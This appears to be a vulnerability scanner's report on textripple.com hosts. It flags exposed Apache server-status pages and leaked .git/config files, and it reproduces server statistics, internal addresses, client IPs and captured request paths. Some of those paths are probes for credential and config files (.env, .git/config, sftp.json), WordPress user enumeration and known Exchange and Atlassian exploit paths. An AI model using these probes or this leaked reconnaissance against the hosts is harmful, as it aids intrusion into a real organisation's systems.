Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:47 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 42 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911805 - Total Traffic: 388.3 GB CPU Usage: u2885.46 s296.71 cu0 cs0 - .0855% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 18 requests currently being processed, 180 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no20yes4140152 1111644no10yes117055 222903no1yes018010 3107167no1yes216010 4112229no1yes018010 5121144no2yes315020 667151no7yes315034 918565no2yes117020 1136524no3yes117030 1436768no0yes018000 1542031no1yes315010 Sum11048 1818003411 RR____R________R___________________R____________________________ ___RR______________________R_______R______W_____R________R__W_.. .................................._______________R__............ ......_______R__________....................................____ _______________________R______RW................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447R 0.36000.00.001872.59 95.101.88.100http/1.1localhost:80GET / HTTP/1.1 0-0192160/1/54507R 0.17100.00.001628.05 73.18.195.9http/1.1 0-0192160/3/54368_ 0.38000.00.001762.17 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/2/54405_ 0.37000.00.001798.21 95.101.88.126http/1.1crm.sprout.online:80GET /telescope/requests HTTP/1.1 0-0192160/2/54476_ 0.29000.00.001693.14 95.101.88.126http/1.1 0-0192160/2/54342_ 0.37000.00.001621.91 95.101.88.100http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/3/54723R 0.330170.00.011745.05 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0192160/1/54372_ 0.37000.00.001721.29 95.101.88.100http/1.1localhost:80GET /.git/config HTTP/1.1 0-0192160/2/54493_ 0.37000.00.011605.35 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 0-0192160/2/54385_ 0.37000.00.001718.61 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0192160/1/54485_ 0.37000.00.001766.88 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/2/54377_ 0.37000.00.001645.23 95.101.88.126http/1.1localhost:80GET / HTTP/1.1 0-0192160/1/54319_ 0.37000.00.001768.49 95.101.88.126http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/1/54534_ 0.37000.00.001721.76 95.101.88.126http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0192160/1/54342_ 0.37000.00.001737.58 95.101.88.100http/1.1crm.sprout.online:80GET /.DS_Store HTTP/1.1 0-0192160/0/54402R 188.340740.00.001704.82 95.101.88.45http/1.1 0-0192160/2/54448_ 0.37000.00.041695.85 95.101.88.100http/1.1localhost:80GET /server-status HTTP/1.1 0-0192160/2/54333_ 0.38000.00.001783.77 95.101.88.100http/1.1localhost:80GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 1-01116440/252/55617_ 22.93000.013.161759.70 96.7.74.175http/1.1crm.sprout.online:80GET /language HTTP/1.1 1-01116440/250/55318_ 22.96000.012.701702.85 95.101.88.126http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01116440/249/55454_ 22.91000.07.411705.27 95.101.88.126http/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 96.7.74.175http/1.1crm.sprout.online:80GET /application HTTP/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 96.7.74.175http/1.1crm.sprout.online:80GET /misc HTTP/1.1 1-01116440/255/55494_ 22.91000.01.541725.60 95.101.88.126http/1.1 1-01116440/238/55539_ 22.91000.010.151685.08 95.101.88.100http/1.1 1-01116440/231/55680_ 22.91000.09.701649.16 95.101.88.100http/1.1 1-01116440/245/55838_ 22.93000.02.761730.21 96.7.74.175http/1.1crm.sprout.online:80GET /includes HTTP/1.1 1-01116440/240/55605_ 22.95000.04.121667.85 95.101.88.126http/1.1crm.sprout.online:80GET /server-status HTTP/1.1 1-01116440/244/55678_ 22.90000.06.967903.59 95.101.88.126http/1.1 1-01116440/251/55417_ 22.92000.04.231690.68 96.7.74.175http/1.1crm.sprout.online:80GET /Session HTTP/1.1 1-01116440/242/55452_ 22.92000.09.401606.63 96.7.74.175http/1.1crm.sprout.online:80GET /odbc HTTP/1.1 1-01116440/237/55364_ 22.92000.09.541786.53 96.7.74.175http/1.1crm.sprout.online:80GET /errors HTTP/1.1 1-01116440/233/55275_ 22.90000.04.191645.66 95.101.88.100http/1.1 1-01116440/247/55604_ 22.91000.013.021701.07 95.101.88.100http/1.1 1-01116440/244/55293_ 22.93000.01.661699.34 96.7.74.175http/1.1crm.sprout.online:80GET /js HTTP/1.1 1-01116440/236/55350R 22.91100.08.211679.77 96.7.74.175http/1.1crm.sprout.online:80GET /cubrid HTTP/1.1 2-0229030/822/59596_ 109.93110.036.611946.19 95.101.88.100http/1.1 2-0229030/859/59771_ 109.763160.045.221932.58 95.101.88.100http/1.1 2-0229030/823/59554_ 110.08100.051.801915.17 95.101.88.100http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 2-0229030/859/60104_ 110.14000.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93100.044.241872.87 95.101.88.126http/1.1 2-0229030/819/59819_ 109.92310.045.341928.60 95.101.88.100http/1.1 2-0229030/839/59997_ 109.813170.045.231876.02 95.101.88.100http/1.1 2-0229030/842/59781_ 109.96310.048.081881.13 95.101.88.126http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 2-0229030/811/59780_ 109.873200.062.181860.43 95.101.88.100http/1.1 2-0229030/837/59810_ 110.01300.049.021853.86 95.101.88.126http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0229030/838/59649_ 109.91300.054.491908.23 95.101.88.100http/1.1 2-0229030/862/59892_ 109.91300.030.271826.50 95.101.88.100http/1.1 2-02290
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614af264f32d
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:48 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 42 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911807 - Total Traffic: 388.3 GB CPU Usage: u2885.5 s296.71 cu0 cs0 - .0855% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 19 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no20yes4140152 1111644no10yes117055 222903no1yes117010 3107167no6yes216040 4112229no1yes018010 5121144no5yes315020 667151no7yes315034 918565no2yes018020 1136524no3yes117030 1436768no0yes018000 1542031no1yes414010 Sum11056 1917903711 RR_____________RR__________________R_________________R__________ ___RR______________________R_______R______W_____R_R______R____.. ..................................__________________............ ......_______R__________....................................____ __________________W____R______RW................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447R 0.36000.00.001872.59 95.101.88.100http/1.1localhost:80GET / HTTP/1.1 0-0192160/1/54507R 0.17100.00.001628.05 73.18.195.9http/1.1 0-0192160/3/54368_ 0.38000.00.001762.17 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/2/54405_ 0.37000.00.001798.21 95.101.88.126http/1.1crm.sprout.online:80GET /telescope/requests HTTP/1.1 0-0192160/2/54476_ 0.29000.00.001693.14 95.101.88.126http/1.1 0-0192160/2/54342_ 0.37000.00.001621.91 95.101.88.100http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/3/54723_ 0.330170.00.011745.05 95.101.88.100http/1.1 0-0192160/1/54372_ 0.37000.00.001721.29 95.101.88.100http/1.1localhost:80GET /.git/config HTTP/1.1 0-0192160/2/54493_ 0.37000.00.011605.35 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 0-0192160/2/54385_ 0.37000.00.001718.61 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0192160/1/54485_ 0.37000.00.001766.88 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/2/54377_ 0.37000.00.001645.23 95.101.88.126http/1.1localhost:80GET / HTTP/1.1 0-0192160/1/54319_ 0.37000.00.001768.49 95.101.88.126http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/1/54534_ 0.37000.00.001721.76 95.101.88.126http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0192160/1/54342_ 0.37000.00.001737.58 95.101.88.100http/1.1crm.sprout.online:80GET /.DS_Store HTTP/1.1 0-0192160/0/54402R 188.340740.00.001704.82 95.101.88.45http/1.1 0-0192160/2/54448R 0.37000.00.041695.85 95.101.88.100http/1.1localhost:80GET /server-status HTTP/1.1 0-0192160/2/54333_ 0.38000.00.001783.77 95.101.88.100http/1.1localhost:80GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 1-01116440/252/55617_ 22.93000.013.161759.70 96.7.74.175http/1.1crm.sprout.online:80GET /language HTTP/1.1 1-01116440/250/55318_ 22.96000.012.701702.85 95.101.88.126http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01116440/249/55454_ 22.91000.07.411705.27 95.101.88.126http/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 96.7.74.175http/1.1crm.sprout.online:80GET /application HTTP/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 96.7.74.175http/1.1crm.sprout.online:80GET /misc HTTP/1.1 1-01116440/255/55494_ 22.91000.01.541725.60 95.101.88.126http/1.1 1-01116440/238/55539_ 22.91000.010.151685.08 95.101.88.100http/1.1 1-01116440/231/55680_ 22.91000.09.701649.16 95.101.88.100http/1.1 1-01116440/245/55838_ 22.93000.02.761730.21 96.7.74.175http/1.1crm.sprout.online:80GET /includes HTTP/1.1 1-01116440/240/55605_ 22.95000.04.121667.85 95.101.88.126http/1.1crm.sprout.online:80GET /server-status HTTP/1.1 1-01116440/244/55678_ 22.90000.06.967903.59 95.101.88.126http/1.1 1-01116440/252/55418_ 22.96000.04.231690.69 95.101.88.100http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/243/55453_ 22.96000.09.401606.63 95.101.88.126http/1.1localhost:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/237/55364W 22.92000.09.541786.53 95.101.88.100http/1.1localhost:80GET /telescope/requests HTTP/1.1 1-01116440/233/55275_ 22.90000.04.191645.66 95.101.88.100http/1.1 1-01116440/247/55604_ 22.91000.013.021701.07 95.101.88.100http/1.1 1-01116440/244/55293_ 22.93000.01.661699.34 96.7.74.175http/1.1crm.sprout.online:80GET /js HTTP/1.1 1-01116440/236/55350R 22.91100.08.211679.77 96.7.74.175http/1.1crm.sprout.online:80GET /cubrid HTTP/1.1 2-0229030/822/59596_ 109.93110.036.611946.19 95.101.88.100http/1.1 2-0229030/859/59771_ 109.763160.045.221932.58 95.101.88.100http/1.1 2-0229030/823/59554_ 110.08100.051.801915.17 95.101.88.100http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 2-0229030/859/60104_ 110.14000.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93100.044.241872.87 95.101.88.126http/1.1 2-0229030/819/59819_ 109.92310.045.341928.60 95.101.88.100http/1.1 2-0229030/839/59997_ 109.813170.045.231876.02 95.101.88.100http/1.1 2-0229030/842/59781_ 109.96310.048.081881.13 95.101.88.126http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 2-0229030/811/59780_ 109.873200.062.181860.43 95.101.88.100http/1.1 2-0229030/837/59810_ 110.01300.049.021853.86 95.101.88.126http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0229030/838/59649_ 109.91300.054.491908.23 95.101.88.100http/1.1 2-0229030/862/59892_ 109.91300.030.271826.50 95.101.88.100http/1.1 2-0
The following URL (usually /.git/config) is publicly accessible and is leaking source code and repository configuration.
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65229fdc1363
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = ssh://wtfs01:22/tfs/DefaultCollection/WP_New/_git/origin-files fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044baa2727ab8135b5bbc521bbb3d8dee4c
[core] repositoryformatversion = 0 filemode = false bare = false logallrefupdates = true [remote "origin"] url = ssh://wtfs01:22/tfs/DefaultCollection/WP_New/_git/origin-files fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a1328f5a1a8d1
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:30 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 46 seconds Server load: 0.30 0.26 0.15 Total accesses: 863232 - Total Traffic: 13.4 GB CPU Usage: u768.93 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no8yes414050 421293no1yes018010 582938no2yes018010 6113967no0yes018000 794980no1yes018010 9107391no0yes018000 11114344no1yes117000 Sum10013 5175080 ______________________________________________________W_________ __R__W_W________________________________________________________ ________________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00200.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0529210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.235180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00200.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0627130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.755160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0951230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.01000.03.6162.27 168.143.243.26http/1.1 0-0113010/311/4566_ 52.1151220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9851290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1051190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8967160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98500.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.01040.02.3335.63 168.143.243.30http/1.1 0-0113010/329/4647_ 52.005120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0438140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00160.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932874480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57190.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.760140.01.1838.56 168.143.243.26http/1.1 1-095220/208/2823_ 21.760150.01.1132.33 168.143.243.26http/1.1 1-095220/200/2775_ 21.57180.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7601650.01.4824.13 168.143.243.26http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.26http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.26http/1.1 1-095220/199/2810_ 21.57100.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.760150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.30http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.30http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.30http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.30http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.30http/1.1 1-095220/204/2789_ 21.741150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.30http/1.1 2-01220760/394/3123_ 42.98510.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9751220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99360.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89221910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.985330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.901750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51500.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.661780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90220.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51600.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.910140.03.9424.64 168.143.243.30http/1.1 2-01220760/384/3025_ 42.95520.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.975320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.911160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.901150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061722350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98340.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069_ 43.002160.08.8839.90 168.143.243.26http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a1328df6e5c54
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:29 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 45 seconds Server load: 0.33 0.27 0.15 Total accesses: 863197 - Total Traffic: 13.4 GB CPU Usage: u768.66 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 4 requests currently being processed, 176 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no9yes216060 421293no1yes018010 582938no2yes117020 6113967no0yes018000 794980no1yes018010 9107391no0yes018000 11114344no1yes117000 Sum10014 41760100 ______________________________________________________W_________ _____W__________________________W_______________________________ ________________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00100.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0528210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.235180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00200.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0626130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.754160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0941230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017200.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1141220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9841290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1041190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8966160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98400.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017240.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0438140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00160.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932774480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.761140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.761150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7611650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61100.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.761150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.751160.04.0043.00 168.143.243.26http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.26http/1.1 1-095220/199/2793_ 21.751110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.741103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.761140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98410.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9751220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99260.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89121910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.984330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.900750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51500.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.661780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90120.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51500.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.910140.03.9424.64 168.143.243.30http/1.1 2-01220760/384/3025_ 42.95520.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.974320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.910160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.900150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061722350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98240.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a13285386cabc
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:20 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 21 seconds Server load: 0.26 0.21 0.23 Total accesses: 8186164 - Total Traffic: 207.0 GB CPU Usage: u1336.11 s208.42 cu0 cs0 - .0344% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 18 requests currently being processed, 180 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no14yes513093 123840no6yes216031 286508no5yes216012 3109764no2yes018020 4116801no2yes117001 533086no5yes216031 621767no12yes216045 7125209no6yes018042 8115169no0yes018000 943856no2yes018011 10129613no7yes414006 Sum11061 1818002722 ___W_R____W_R_W____R_______________W_R__R_______________________ ______________W__________________WR_____________W___W___________ ______________________________________________________RR___R____ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/208/40344_ 17.13020.03.69868.70 96.7.74.198http/1.1 0-0987300/242/40336_ 17.65000.03.87867.78 96.7.74.198http/1.1crm.textripple.com:443GET /debug/default/view?panel=config HTTP/1.1 0-0987300/256/40552_ 17.48000.02.13988.51 96.7.74.198http/1.1 0-0987300/219/40515W 17.63000.01.20854.94 96.7.74.198http/1.1crm.textripple.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/224/40323_ 17.65070.01.13924.77 96.7.74.175http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0987300/242/40604R 17.63000.04.52963.21 96.7.74.198http/1.1crm.textripple.com:443GET /telescope/requests HTTP/1.1 0-0987300/241/40592_ 17.65000.04.03887.12 96.7.74.175http/1.1crm.textripple.com:443GET /.vscode/sftp.json HTTP/1.1 0-0987300/244/40497W 17.63000.01.42781.01 96.7.74.175http/1.1crm.sprout.online:443HEAD /login.php HTTP/1.1 0-0987300/236/40603_ 17.47000.03.94985.85 96.7.74.198http/1.1 0-0987300/220/40493_ 17.560110.01.24830.92 96.7.74.198http/1.1 0-0987300/243/40326W 17.111300.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/218/40295_ 17.34000.01.11835.96 96.7.74.198http/1.1 0-0987300/213/40501_ 17.63000.01.55867.48 96.7.74.198http/1.1 0-0987300/234/40370_ 17.63010.01.45907.11 96.7.74.198http/1.1crm.textripple.com:443GET /info.php HTTP/1.1 